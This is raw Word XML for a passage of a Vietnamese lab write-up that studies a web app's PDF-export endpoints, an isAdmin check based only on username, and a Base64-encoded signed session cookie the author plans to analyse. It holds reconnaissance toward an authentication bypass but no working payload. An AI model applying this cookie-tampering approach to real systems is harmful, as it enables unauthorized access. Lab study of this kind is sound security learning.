              <w:t xml:space="preserve"> generatedPDF = </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>await</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> generatePDF(content);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EA3D275" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3"/>
          <w:p w14:paraId="6DCDDF11" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> res.send(generatedPDF);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DF38617" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A5E2836" w14:textId="77777777" w:rsidR="000166A3" w:rsidRDefault="000166A3"/>
    <w:p w14:paraId="3E9075A1" w14:textId="58BE5748" w:rsidR="00B918F0" w:rsidRDefault="00D83FDE">
      <w:r>
        <w:t>Hai endpoint bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162C1A53" w14:textId="15B88FEF" w:rsidR="00D83FDE" w:rsidRDefault="00D83FDE" w:rsidP="00CC5B35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GET /document/export/:id : </w:t>
      </w:r>
      <w:r w:rsidR="00704CE9">
        <w:t>Thực hiện trước năng tìm kiếm tài liệu theo id từ req.</w:t>
      </w:r>
      <w:r w:rsidR="00CC5B35">
        <w:t xml:space="preserve">params, </w:t>
      </w:r>
      <w:r w:rsidR="00CC5B35" w:rsidRPr="00CC5B35">
        <w:t>sau đó nội dung được xử lý và trả về dưới dạng file PDF</w:t>
      </w:r>
      <w:r w:rsidR="00CC5B35">
        <w:t xml:space="preserve"> thông qua hàm </w:t>
      </w:r>
      <w:r w:rsidR="00CC5B35" w:rsidRPr="000166A3">
        <w:t>generatePDF</w:t>
      </w:r>
      <w:r w:rsidR="00CC5B35" w:rsidRPr="00CC5B35">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEEC792" w14:textId="42931B2A" w:rsidR="00597036" w:rsidRDefault="00CC5B35" w:rsidP="00597036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POST /document/debug/export: </w:t>
      </w:r>
      <w:r w:rsidR="00861378">
        <w:t xml:space="preserve">Cũng thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="001175B9" w:rsidRPr="001175B9">
        <w:t>xuất tài liệu dưới dạng file PDF, nhưng</w:t>
      </w:r>
      <w:r w:rsidR="00727BA6">
        <w:t xml:space="preserve"> cần sử dụng access_pass để xác minh quyền truy cập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F5FD5" w14:textId="77777777" w:rsidR="00597036" w:rsidRDefault="00597036" w:rsidP="00597036">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBE4B92" w14:textId="589E1E35" w:rsidR="00597036" w:rsidRDefault="000B6DED" w:rsidP="00597036">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vì </w:t>
      </w:r>
      <w:r w:rsidRPr="000B6DED">
        <w:t>hàm isAdmin được sử dụng làm middleware để kiểm tra quyền truy cập của người dùng đối với các endpoint nhạy cảm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nên </w:t>
      </w:r>
      <w:r w:rsidR="00873CCA">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00597036">
        <w:t>iếp đó mình sẽ nghiên cứu hàm isAdmin:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9072" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="198"/>
        <w:gridCol w:w="8874"/>
      </w:tblGrid>
      <w:tr w:rsidR="002227D1" w:rsidRPr="002227D1" w14:paraId="67A69593" w14:textId="77777777" w:rsidTr="00597036">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4919D711" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F5C7685" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193BDA3C" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="282FE479" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="505CC408" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D94B17" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58225F36" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39AB7AC0" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:t xml:space="preserve"> isAdmin = (req, res, next) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0290F351" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:t xml:space="preserve"> (req.user.username === </w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"admin"</w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD31C8E" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:t xml:space="preserve"> next();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76FB3AEB" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F103738" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C231DE9" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:t xml:space="preserve"> res.status(403).send(</w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Forbidden"</w:t>
            </w:r>
            <w:r w:rsidRPr="002227D1">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A3F40D1" w14:textId="77777777" w:rsidR="002227D1" w:rsidRPr="002227D1" w:rsidRDefault="002227D1" w:rsidP="002227D1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002227D1">
              <w:t>};</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A38E77D" w14:textId="77777777" w:rsidR="00497517" w:rsidRDefault="00497517" w:rsidP="00497517">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="743E3121" w14:textId="051122A1" w:rsidR="00727BA6" w:rsidRDefault="001358E0" w:rsidP="001358E0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Từ kết quả này, mình nghĩ rằng endpoint </w:t>
      </w:r>
      <w:r>
        <w:t>/document/export/:id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là một vị trí tiềm năng </w:t>
      </w:r>
      <w:r w:rsidR="00497517">
        <w:t xml:space="preserve">và có khả năng có thể truy cập được vì chỉ cần </w:t>
      </w:r>
      <w:r w:rsidR="00E90ACD">
        <w:t xml:space="preserve">có username </w:t>
      </w:r>
      <w:r w:rsidR="002518DD">
        <w:t xml:space="preserve">là admin là có thể truy cập được (vì bài lab này lúc khởi động không có user nào cả nên cũng có thể tạo tài khoản tên </w:t>
      </w:r>
      <w:r w:rsidR="0035230B">
        <w:t>là</w:t>
      </w:r>
      <w:r w:rsidR="001B5858">
        <w:t xml:space="preserve"> admin để sử dụng nhưng mình sẽ tiếp tục dùng tài khoản thường để </w:t>
      </w:r>
      <w:r w:rsidR="00446060">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00446060" w:rsidRPr="00446060">
        <w:t xml:space="preserve">iểm tra khả năng truy </w:t>
      </w:r>
      <w:r w:rsidR="00446060">
        <w:t>cập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2EC2C6" w14:textId="111494D9" w:rsidR="006C29DA" w:rsidRDefault="0004675F">
      <w:r w:rsidRPr="0004675F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D9EF8B6" wp14:editId="7280D48B">
            <wp:extent cx="5731510" cy="836930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="203357482"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57482" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="836930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCEF53E" w14:textId="60EBF9F0" w:rsidR="008861B1" w:rsidRDefault="008861B1" w:rsidP="008861B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="008861B1">
        <w:t xml:space="preserve">ết quả kiểm thử cho thấy rằng việc truy cập không thành công. Hệ thống phản hồi với mã lỗi 403 Forbidden, xác nhận rằng </w:t>
      </w:r>
      <w:r>
        <w:t>hàm</w:t>
      </w:r>
      <w:r w:rsidRPr="008861B1">
        <w:t xml:space="preserve"> isAdmin đã được thực thi đúng và ngăn chặn truy cập từ tài khoản không có quyền quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5485C3" w14:textId="5B80E33C" w:rsidR="00E956EC" w:rsidRDefault="00E956EC" w:rsidP="008861B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau đó khi mình nghiên cứu cookie thì phát hiện </w:t>
      </w:r>
      <w:r w:rsidR="00236924" w:rsidRPr="00236924">
        <w:t>hệ thống sử dụng cookie để lưu trữ thông tin người dùng dưới dạng chuỗi mã hóa Base64. Sau khi giải mã, nội dung cookie hiển thị ở dạng</w:t>
      </w:r>
      <w:r w:rsidR="00A14C32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD305A">
        <w:t xml:space="preserve">bản rõ là </w:t>
      </w:r>
      <w:r w:rsidR="00BD305A" w:rsidRPr="00BD305A">
        <w:t>{"username":"abcdef","id":</w:t>
      </w:r>
      <w:r w:rsidR="00BD305A">
        <w:t>1}</w:t>
      </w:r>
      <w:r w:rsidR="00236924">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FCD390" w14:textId="5AD8624C" w:rsidR="005D5BAD" w:rsidRDefault="00E956EC" w:rsidP="008861B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E956EC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A3FE995" wp14:editId="0408DB83">
            <wp:extent cx="5731510" cy="1276985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1465388825"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388825" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1276985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ECB03F" w14:textId="4D7B1160" w:rsidR="00236924" w:rsidRPr="008861B1" w:rsidRDefault="000154A3" w:rsidP="008861B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000154A3">
        <w:t>Mặc dù phần đầu của cookie chứa thông tin người dùng được mã hóa bằng Base64, phía sau vẫn tồn tại một chuỗi hash có thể là chữ ký số nhằm xác thực tính toàn vẹn của dữ liệu. Để xác định chính xác cơ chế bảo vệ được áp dụng,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A14C32">
        <w:t xml:space="preserve">mình sẽ kiểm tra kĩ source code </w:t>
      </w:r>
      <w:r w:rsidR="005A36D4">
        <w:t xml:space="preserve">liên quan đến việc tạo </w:t>
      </w:r>
      <w:r>
        <w:t>cookie:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9072" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="320"/>
        <w:gridCol w:w="8752"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C29DA" w:rsidRPr="006C29DA" w14:paraId="7BCA67E9" w14:textId="77777777" w:rsidTr="006C29DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="383EF38F" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6212784C" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="799DF7D6" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C39D317" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1163E70F" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40A3EBC9" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9966D8" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770B4ABA" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="073EAEE5" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AC83B45" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E9682C2" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F232B43" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="733F7A8F" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="654DBC41" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723BF0A3" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="008B940E" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05BB93DD" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0824304D" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5D9C9F" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="754E657E" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B988E2E" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06935AD9" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E10EC08" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A3BC765" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="725D5B62" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0287BBD0" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C3CBBC2" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30FBC6DD" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4608DE68" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D49189E" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58424142" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00CE7558" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7867D2" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25339545" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46F23CF6" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56199719" w14:textId="77777777" w:rsidR="006C29DA" w:rsidRPr="006C29DA" w:rsidRDefault="006C29DA" w:rsidP="006C29DA">
            <w:r w:rsidRPr="006C29DA">
              <w:lastRenderedPageBreak/>
              <w:t>36</w:t>
            </w:r>
          </w:p>
